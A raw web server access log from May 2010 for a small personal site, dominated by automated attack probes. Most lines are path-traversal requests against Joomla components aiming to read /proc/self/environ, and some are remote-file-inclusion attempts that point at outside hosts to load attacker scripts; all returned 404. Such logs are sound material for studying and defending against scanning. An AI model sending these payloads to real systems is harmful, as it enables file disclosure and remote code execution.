204.152.200.50 - - [28/May/2010:01:03:57 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:04:03 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:04:04 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:04:04 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
209.44.120.2 - - [28/May/2010:01:04:05 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:05:08 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:05:09 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:05:09 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:01:06:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:06:28 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:06:28 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
207.46.204.189 - - [28/May/2010:01:06:28 -0500] "GET /logs/access_log.1184630400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.51.42.60 - - [28/May/2010:01:06:29 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:01:06:29 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:01:06:29 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:01:06:29 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.250.255.243 - - [28/May/2010:01:08:14 -0500] "GET /logs/access_log.1254096000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [28/May/2010:01:08:46 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:09:09 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:09:10 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:01:09:31 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:09:32 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:09:33 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:10:23 -0500] "GET /logs/access_log.1274313600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:10:36 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:10:37 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:10:37 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:01:10:47 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:01:10:47 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:01:10:47 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:01:10:54 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:10:54 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:10:54 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:10:57 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:10:57 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:10:57 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
207.46.13.41 - - [28/May/2010:01:11:58 -0500] "GET /logs/access_log.1192492800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.60.53.122 - - [28/May/2010:01:12:55 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.96.234 - - [28/May/2010:01:13:03 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:01:13:03 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:01:13:03 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:01:13:03 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
209.44.120.2 - - [28/May/2010:01:13:08 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:01:13:17 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:13:17 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:13:17 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:01:13:24 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:13:25 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:13:25 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
222.122.52.80 - - [28/May/2010:01:13:53 -0500] "GET /logs/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:13:53 -0500] "GET /allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:13:53 -0500] "GET /logs/access_log.1271548800/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:14:01 -0500] "GET /allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:14:01 -0500] "GET /logs/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:14:01 -0500] "GET /logs/access_log.1271548800/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:14:21 -0500] "GET /allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:14:21 -0500] "GET /logs/access_log.1271548800/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:14:21 -0500] "GET /logs/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:01:14:33 -0500] "GET /logs/access_log.1274313600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:14:33 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:14:33 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:01:15:10 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.96.234 - - [28/May/2010:01:18:08 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:01:18:08 -0500] "GET /index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:01:18:08 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:01:18:08 -0500] "GET /index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
194.100.228.237 - - [28/May/2010:01:18:32 -0500] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.100.228.237 - - [28/May/2010:01:18:32 -0500] "GET //index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.100.228.237 - - [28/May/2010:01:18:34 -0500] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.100.228.237 - - [28/May/2010:01:18:34 -0500] "GET //index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.14.231.236 - - [28/May/2010:01:18:43 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 287 "-""libwww-perl/5.805"
74.14.231.236 - - [28/May/2010:01:18:43 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 282 "-""libwww-perl/5.805"
217.116.47.110 - - [28/May/2010:01:18:57 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:01:18:58 -0500] "GET /index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:01:18:59 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:01:19:00 -0500] "GET /index.php?option=com_abbrev&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [28/May/2010:01:21:29 -0500] "GET /logs/access_log.1207872000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
71.197.200.174 - - [28/May/2010:01:21:57 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:21:57 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.197.200.174 - - [28/May/2010:01:22:04 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
207.46.13.48 - - [28/May/2010:01:22:28 -0500] "GET /logs/access_log.1171324800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.60.53.122 - - [28/May/2010:01:22:49 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
207.46.13.40 - - [28/May/2010:01:22:59 -0500] "GET /logs/access_log.1250553600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [28/May/2010:01:25:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:25:28 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:25:29 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:29:12 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:29:12 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:29:13 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:29:28 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:31:02 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:31:02 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:31:03 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:31:10 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:31:10 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:31:11 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.194.148 - - [28/May/2010:01:31:52 -0500] "GET /artwork/tbig-catch-diorama.jpg HTTP/1.1" 200 8571 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [28/May/2010:01:32:15 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:32:24 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
222.122.52.80 - - [28/May/2010:01:33:05 -0500] "GET /logs/access_log.1272672000/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [28/May/2010:01:33:53 -0500] "GET /logs/access_log.1247702400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.122.52.80 - - [28/May/2010:01:35:10 -0500] "GET /logs/access_log.1272672000/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:01:36:00 -0500] "GET /logs/access_log.1272672000/allinurl:%22.php?_REQUEST%20=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
119.63.198.3 - - [28/May/2010:01:36:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
114.108.151.149 - - [28/May/2010:01:39:10 -0500] "GET /logs/access_log.1274313600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:39:11 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:39:11 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.204.180 - - [28/May/2010:01:41:29 -0500] "GET /logs/access_log.1249776000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [28/May/2010:01:44:22 -0500] "GET /logs/access_log.1274227200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.250.255.243 - - [28/May/2010:01:45:49 -0500] "GET /logs/access_log.1249862400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.14.231.236 - - [28/May/2010:01:47:15 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
74.14.231.236 - - [28/May/2010:01:47:15 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
80.65.166.74 - - [28/May/2010:01:49:22 -0500] "GET /index.php?meio.php=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [28/May/2010:01:49:22 -0500] "GET /logs/index.php?meio.php=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [28/May/2010:01:49:23 -0500] "GET /index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [28/May/2010:01:49:23 -0500] "GET /logs/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [28/May/2010:01:49:23 -0500] "GET /index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [28/May/2010:01:49:23 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
